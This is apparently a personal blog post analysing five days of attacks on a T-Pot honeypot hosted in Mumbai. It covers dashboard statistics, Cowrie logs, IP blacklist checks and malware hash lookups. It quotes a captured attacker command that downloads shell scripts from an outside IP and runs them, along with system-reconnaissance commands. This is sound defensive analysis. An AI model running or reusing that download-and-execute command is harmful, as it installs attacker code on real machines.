Mumbai Honeypot Threat Analysis
Table of Contents
- Introduction
- T-Pot Dashboard
- Cowrie
- Cowrie — Blacklist Check
- Cowrie — Commands
- Cowrie — Hash Analysis
- Debrief
Introduction
The threat analysis in this blog occurred over five days. I created and generated this T-Pot using Amazon Web Services. If you would like to create your T-Pot click on this link to learn more.
T-Pot is a multi-honeypot platform. It uses multiple well-known honeypots and IDS to analyze and gather data from attacks. For this blog post, I will be using the Kibana dashboard to analyze the data gathered from my honeypots. The Kibana T-Pot dashboard provides up-to-date data from all of the honeypots that make up T-Pot. We can also select to see individual honeypots or filter out specific data from our dashboard. We will start by examining the T-Pot Dashboard first before moving on to the Cowrie honeypot.
T-Pot Dashboard
On the T-Pot dashboard, we can see all of the statistical graphs and information the honeypots are gathering from each attack. We can see that the Cowrie honeypot has had the most hits. The port used for most of the attacks has been port 445 (SMB) with port 22 (SSH).
In the other blocks, we can see the top operating systems used for these attacks, top ports by country, and the types of attacks being conducted with privilege escalation making up a large portion of the attacks.
Let’s take a look at some of the commands being used on the honeypots. The first one
cd /data/local/tmp/; busybox wget http://194.31.98.205/w.sh; sh w.sh; curl http://194.31.98.205/c.sh; sh c.sh
looks interesting so let us begin deciphering what this all means. The cd / data/local/tmp/ command is changing or moving to the “/data/local/tmp/ ” directory. The “tmp” directory stores temporary copies of files and will update these files regularly. The next command is busybox wget http://194.31.98. 205/w.sh;sh w.sh. The busybox command filters out rarely used flags for a command. In this command, the busybox wget will retrieve the file via HTTP.
So now that we know that this attack is meant to download something from the web let’s see if this link is malicious. I used the site https://urlscan.io/ to look up the URL http://194.31.98.205/. Urlscan.io is a great website to scan and analyze websites that look suspicious. On the results page, we can see that this URL has been flagged as malicious. We can also see the location of the IP address and the system it belongs to.
Let’s move on and look at another block in the T-Pot dashboard. At the bottom of the page, we can see the top 10 signature attacks on the honeypots. At the top with the most counts is
ET EXPLOIT [PTsecurity] DoublePulsar Backdoor installation communication
The DoublePulsar full kernel payload is a backdoor that hides in a system avoiding detection from anti-malware or other detection systems. It uses a backdoor to inject a system with malicious code to take control of the system. It has also been found to wipe memory as a form of evasion however parts of the code remain on the victim’s system (Arghire, 2017). The NSA’s FuzzBunch software, a similar exploitation framework to Metasploit uses this payload to exploit SMB and RDP.
Lastly, at the bottom of the T-Pot dashboard are the usernames and passwords the threat actors used to try and log into the honeypots. I found these blocks to be incredibly important because it goes to show us how important password complexity is in network security.
Cowrie
Now let us take a look at the Cowrie dashboard. Cowrie is a honeypot designed to be used for SSH and Telnet connections. When an attacker uses brute force attacks or logs in via SSH. Cowrie will log those interactions giving us insight as to how the attack was conducted.
In the first three days, there have been 45,083 attacks on the Cowrie honeypot.
Japan made up 28% of those attacks, the United States made up 22%, followed by China with 18%. On the fifth day, the number of attacks from these three countries was almost equal. The United States took the top spot followed by Japan and China.
Cowrie — Blacklist check
Looking through the Cowrie dashboard there is a list of the top 10 IP addresses with the most attacks. Ranked number one is the source IP 43.154.33.84. Let’s investigate and find out where this source IP is coming from. First, let us check https://www.ipvoid.com/ to see if this IP is on a blacklist. IPVoid is a great site to research additional details about an IP address. IPVoid was created as an IP blacklist checker however over the years more services and tools have been added to provide greater details to IP addresses. Let’s see whether this IP is on a blacklist by entering the IP address on the IP Blacklist Check box.
On the results page, we get where the source IP is coming from, the internet service provider, and of course the blacklist. From the list, we know this IP is associated with malicious and spamming activities.
Let’s click on the first link, we can see what servers the IP address 43.154.33.84 has made attacks to. From the list, we can see all of the servers that have blocked that specific IP address and the time and dates these attacks took place.
We can conclude that 43.154.33.84 is a malicious IP address that should be blocked from our servers because of the information we gathered on IPVoid.
Cowrie — Commands
Now let us take a look at the top 10 commands used on the Cowrie honeypot.
From the list, we can tell that most of these commands are looking for system information. Let us decipher what the first command means.
cat /proc/cpuinfo | grep model | grep name | wc -l
cat is a command line in Linux that displays the contents of a file. The malicious actor wants to see what is inside of the “/proc/cpuinfo file” … hmm I wonder why. If you guessed CPU info you are correct. The “cpuinfo” file contains the types of processors the system is running which include the model name, cache size, number of CPUs present, the speed of the processor, flags, and much more.
The command grep is a search tool found in most operating systems. It searches for character strings in a file or directory and then prints out the line containing those strings. In this case, the malicious actor is searching for “model” in the “/proc/cpuinfo” file which will print out the line with the “model” character string. The same is applied to the next grep command “name”. The last command wc counts the number of lines, words, and bytes that are in a file. The flag “-l” indicates to print out only the number of lines in the file. So let’s put this all together. The user is trying to see the number of lines under the model name in the “proc/cpuinfo file”, which from the previous image is giving us this result.
The same applies to the next command cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
When I ran this command on my Kali Linux, the model name for my processer popped up which is useful information for an adversary to find specific vulnerabilities with this processor.
Looking down the list of the top 10 command line inputs, the top command is another useful command line that displays the running process in a Linux machine in real-time, kernel-managed tasks, and the system information summary.
Cowrie — Hash Analysis
Lets us move on and take a look at the Cowrie Discover page. In the search bar on the top, I typed in “Pakistan” to filter out the logs containing the word “Pakistan”. Looking through the logs, I found this log that looked interesting. The log contained an md5 hash. Let us look up this hash to see if it is malicious. I used a malware hash registry to find this out. There are several sites that provide this type of service. I copied the hash and pasted it on the malware hash registry https://hash.cymru.com/, then clicked submit.
Well, from the results it looks like this hash is malicious.
Let us look at another one.
This looks like the attacker was downloading something onto the honeypot because of the wget command. As we know wget is used to download or retrieve contents from a file on a web server. I copied the link http://194.31.98.205/c.sh on virustotal.com, pasted it on the URL search bar, and here is the result.
This URL site is malicious in nature. In the details tab, we can find further information as to what the source IP is, the type of hash, and the content type.
Debrief
The information we gathered on T-Pot gave us insight as to how threat actors go about attacking a network. We were able to view real-time attacks as they were occurring on the attack map and view the log files in Kibana. The Mumbai location for the T-Pot server received a range of attacks from all over the world. Considering India’s relationship with Pakistan, I did not see many attacks from that nation. There was no particular country that made up most of the attacks on the honeypots. The number of attacks by each nation was spread out equally by the end of the fifth day. The Cowrie honeypot experienced the most attacks out of the 20+ honeypots used in this report. The attacks used on this honeypot used malicious sites to download malware onto the honeypot. We used various tools to help us investigate suspicious IP addresses and malware hashes through our threat analysis.
I hope you found this blog post helpful and informational. Thank you for taking the time to read it. I will be posting more blogs on cybersecurity in the future. Stay tuned and don’t forget to follow if you would like to receive notifications on my next blog post.
References
Arghire, I. (2017, April 24). Hackers are using NSA’s DoublePulsar Backdoor in Attacks. Security Week. https://s1.securityweek.com/hackers-are-using-nsas-doublepulsar-backdoor-attacks
